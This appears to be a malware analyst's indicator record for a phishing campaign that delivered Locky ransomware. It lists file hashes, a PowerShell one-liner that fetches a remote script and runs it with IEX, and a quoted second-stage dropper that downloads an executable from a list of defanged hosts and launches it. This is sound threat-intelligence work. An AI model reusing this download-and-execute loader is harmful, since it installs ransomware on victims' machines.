- Initial Payload:
- 4467239f46d04d20df5a6ce0195c457ba3a21bc2fa48d5d82ed13f8e8bca3305
- Type: base64 encoded doc file attached to phishing email
- Action: powershell.exe -nop -noexit -c "$sr = (new-object System.IO.StreamReader ((([System.Net.WebRequest]::Create('http://nikom[.]be/kjh765e46')).GetResponse()).GetResponseStream())).ReadToEnd();IEX $sr;"
- Response:
    $urls = "http://internet-webshops[.]de/O77enbdGF5","http://ist-profy[.]ru/O77enbdGF5","http://lvps212-67-205-60[.]vps[.]webfusion[.]co[.]uk/O77enbdGF5","http://matternomatter[.]com/O77enbdGF5","http://m[.]monteschiavo[.]com/O77enbdGF5","http://minascriptandart[.]nl/O77enbdGF5","http://hilaryandsavio[.]com/O77enbdGF5","http://verwadirephen[.]info/p66/O77enbdGF5"
    $urls = $urls | Sort-Object {Get-Random}
    foreach($url in $urls) {
        Try {
            Write-Host $url
            $f = "D:\MALWARE\171102\envbit32.exe"
            Write-Host $f
            (New-Object System.Net.WebClient).DownloadFile($url, $f)
            Start-Process $f
            break
        } Catch {
        }
    }
- Stage 2 Payloads:
- 0610dae1ee563513ec9bab3ae13b0eb2ee509a791f79b6b8bbf91fd46aaca2c4
- 0f9ca5c555ddf4b5b29573ea1a513a69555afcfd0b1d3fa8f441bc6991bce543
- Type: binary executable
- Action: Ransomware infection (Locky)
- Blacklist: